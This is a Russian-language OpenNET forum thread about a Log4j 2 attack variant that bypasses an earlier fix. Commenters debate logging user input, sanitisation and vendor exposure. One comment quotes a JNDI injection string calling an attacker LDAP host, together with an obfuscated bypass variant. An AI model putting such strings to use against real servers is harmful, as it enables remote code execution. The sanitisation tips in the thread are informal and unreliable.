The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

Новый вариант атаки на Log4j 2, позволяющий обойти добавленную защиту, opennews (??), 15-Дек-21, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


11. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  –3 +/
Сообщение от Аноним (7), 15-Дек-21, 11:01 
> Как соотносится "использует полтора программиста" и подтверждённое проявление уязвимости в продуктах GitHub, Docker, Oracle, vmWare, Broadcom и Amazon/AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, Intel, NATS, Trend Micro, Aruba Networks, Microsoft, Siemens и Rockwell?

Фактом наличия в зависимостях проектов. То есть, никак, по факту.

Ответить | Правка | Наверх | Cообщить модератору

12. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +1 +/
Сообщение от полураспад (?), 15-Дек-21, 11:05 
в нормальном коде не выводятся параметры приходящие от пользователя в лог, плюс это проверка давно существует в анализаторах безопастности, они показывают где параметры из запросов логируются в лог
Ответить | Правка | Наверх | Cообщить модератору

14. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +4 +/
Сообщение от Аноним (13), 15-Дек-21, 11:11 
Выходит "нормальный" по вашим представлениям код в корпоративной среде не встречается. Плюс на практике было показано как уязвимость работала в системах Amazon, Microsoft и многих других. У них "анализаторы безопасности" тоже какие-то неправильные?
К чему в таком случае вся эта ремарка?
Ответить | Правка | Наверх | Cообщить модератору

93. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноньимъ (ok), 15-Дек-21, 18:43 
>Выходит "нормальный" по вашим представлениям код в корпоративной среде не встречается.

А ведь он прав.

Ответить | Правка | Наверх | Cообщить модератору

18. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +2 +/
Сообщение от Аноним (18), 15-Дек-21, 11:20 
Скажите это тем, кто пишет в лог значение User Agent, X-Forward-For и прочих заголовков. В логи такое пишут повсеместно.
Ответить | Правка | К родителю #12 | Наверх | Cообщить модератору

28. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +4 +/
Сообщение от Фняк (?), 15-Дек-21, 11:55 
Это почему? Вот вызвали функцию с какими-то параметрами. Функция проверила параметры и какие-то из них не валидны. Перед тем как вернуть соответствующий код возврата она пишет в лог сообщение о том что вот не получилось выполнить работу потому во то условие не выполняется при вот этих входных параметрах. Пишет это она для админа на случай если к нему придут с вопросами «а почему не работает?» функция сама по себе понятия не имеет откуда переданные параметры взялись, от пользователя или ещё откуда
Ответить | Правка | К родителю #12 | Наверх | Cообщить модератору

30. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +8 +/
Сообщение от пох. (?), 15-Дек-21, 11:58 
точно, нормальный код логает в лог только ok и error. Предоставляя гадать, что именно было ok и чего error.

Дайте угадаю - вы разработчик на модном языке?

Ответить | Правка | К родителю #12 | Наверх | Cообщить модератору

76. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +1 +/
Сообщение от quanticemail (?), 15-Дек-21, 15:06 
Проблема не в том что значения от пользователя выводятся в лог, проблема в том что log4j их не фильтрует. Это их факап.
Ответить | Правка | К родителю #12 | Наверх | Cообщить модератору

100. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от john_erohin (?), 15-Дек-21, 20:28 
> в нормальном коде не выводятся параметры приходящие от пользователя в лог,

врать не надо. навскидку:
apache выводит referer и user-agent (оба от пользователя) в combined log.
bind выводит попытки рекурсии от обнаглевших "сканеров безопастности" в лог.
что, у них ненормальный код ?

Ответить | Правка | К родителю #12 | Наверх | Cообщить модератору

102. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (102), 15-Дек-21, 20:45 
Только эксперты с opennet знают как правильно писать код. Жаль что почему-то не пишут
Ответить | Правка | К родителю #12 | Наверх | Cообщить модератору

20. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +2 +/
Сообщение от Аноним (18), 15-Дек-21, 11:22 
Это компании которые _сами_ подтвердили проявление уязвимости Log4j в своих продуктах. Логи с отражением User Agent по умолчанию ведут почти все корпоративные системы.
Ответить | Правка | К родителю #11 | Наверх | Cообщить модератору

31. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +2 +/
Сообщение от Аноним (-), 15-Дек-21, 11:58 
1) Далеко не все делают бесконтрольную подстановку данных, принятых от пользователя, непосредственно в ".. {}.." лога.
2) Не самый распространённый случай использования JNDI внутри организации.
3) Неплохо бы иметь доступ к ресурсам JNDI из сети, где расположен сервис.

А теперь вопрос - скольких компаний  это реально касается до такой степени, чтобы кричать "ужас-ужас"?

Ответить | Правка | Наверх | Cообщить модератору

40. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +3 +/
Сообщение от Аноним (40), 15-Дек-21, 12:36 
> не все делают бесконтрольную подстановку данных, принятых от пользователя, непосредственно в ".. {}.." лога.

А как надо правильно логировать http запрос от пользователя?

Ответить | Правка | Наверх | Cообщить модератору

42. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +2 +/
Сообщение от Аноним (7), 15-Дек-21, 12:45 
Любым способом, не подразумевающим подстановку поля, полученного от пользователя в конструкцию "{}". Вроде не сложно такой подобрать

PS: если руководствоваться здравым смыслом при написании программы, то случаев, когда значения HTTP-заголовков подставляются в log4j непосредственно, не так уж и много. И вообще, не приходит в голову, когда это может понадобиться.

Ответить | Правка | Наверх | Cообщить модератору

48. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Урри (ok), 15-Дек-21, 12:56 
А если {} уже в полученном от пользователя поле?
Ответить | Правка | Наверх | Cообщить модератору

53. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  –1 +/
Сообщение от Аноним (-), 15-Дек-21, 13:05 
msg.replace("{", "")


Ну, или, не используйте log4j2.

Ответить | Правка | Наверх | Cообщить модератору

54. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +1 +/
Сообщение от Аноним (54), 15-Дек-21, 13:17 
Вы лучше не используйте replace.

Ибо %7B

Ответить | Правка | Наверх | Cообщить модератору

70. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (7), 15-Дек-21, 14:38 
%7B тоже log4j2 интерпретирует?
Ответить | Правка | Наверх | Cообщить модератору

110. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Онаним (?), 16-Дек-21, 09:10 
Вот, самое правильное предложение.
Тянуть в рот васянские поделки - зло. Тем более, что изобретение данного "велосипеда" - дело по сути минутное.
Ответить | Правка | К родителю #53 | Наверх | Cообщить модератору

65. "то есть жабисты обосрались но изворачиваются"  +/
Сообщение от примерно_36_скотинок (ok), 15-Дек-21, 14:02 
утверждая, что их дерьмо надо было покрыть глазурью, посахарить и вот-тогда-то получится конфетка. просто видите ли говно неправильно готовят.
Ответить | Правка | К родителю #42 | Наверх | Cообщить модератору

73. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (40), 15-Дек-21, 14:51 
Если я подставлю допустим объект, содержащий тело и мапу заголовков - это нормально? Главное не подставить в {} строку со значением?
Ответить | Правка | К родителю #42 | Наверх | Cообщить модератору

92. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (7), 15-Дек-21, 18:33 
Пример из оригинала - https://www.lunasec.io/docs/blog/log4j-zero-day/#example-vul...

Если нет в строке {..}, то ничего и не запустит. URL-decode оно само делать не умеет.

Ответить | Правка | Наверх | Cообщить модератору

77. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от YetAnotherOnanym (ok), 15-Дек-21, 15:07 
> А как надо правильно логировать http запрос от пользователя?

Дословно, с предварительным обеззараживанием, обесклычиванием, убеганием и прочими аналогичными процедурами.

Ответить | Правка | К родителю #40 | Наверх | Cообщить модератору

105. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (102), 15-Дек-21, 21:39 
Подскажите, как правильно обезораживать и обесклычивать в java?
Ответить | Правка | Наверх | Cообщить модератору

113. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от YetAnotherOnanym (ok), 16-Дек-21, 15:43 
С этим обращайтесь на стаковерфлоу.
Ответить | Правка | Наверх | Cообщить модератору

122. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (102), 19-Дек-21, 10:07 
Что же ты пишешь что нужно обесклычивать если сам не знаешь как это делать?
Ответить | Правка | Наверх | Cообщить модератору

60. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +1 +/
Сообщение от Аноним (60), 15-Дек-21, 13:40 
Достаточно любой подстановки внешних данных в лог, не важно как они переданы через подстановку или голой строкой. Главная проблема в этой узявимости, что Log4j сам разберёт "${..}" в выводимой строке, никаких особых подстановок для этого делать не нужно. Т.е.  написал в коде "logger.info(extvar);" и можно хакнуть, если есть возможность переть в  extvar что-то типа "${jndi:ldap://attacker.com/a}" или "${env:FOO:-j}ndi:${lower:L}da${lower:P}", как в примере в новости.
Ответить | Правка | К родителю #31 | Наверх | Cообщить модератору

72. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (7), 15-Дек-21, 14:46 
Как хорошо, что ничего кроме slf4j/logback у нас не используется....
Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру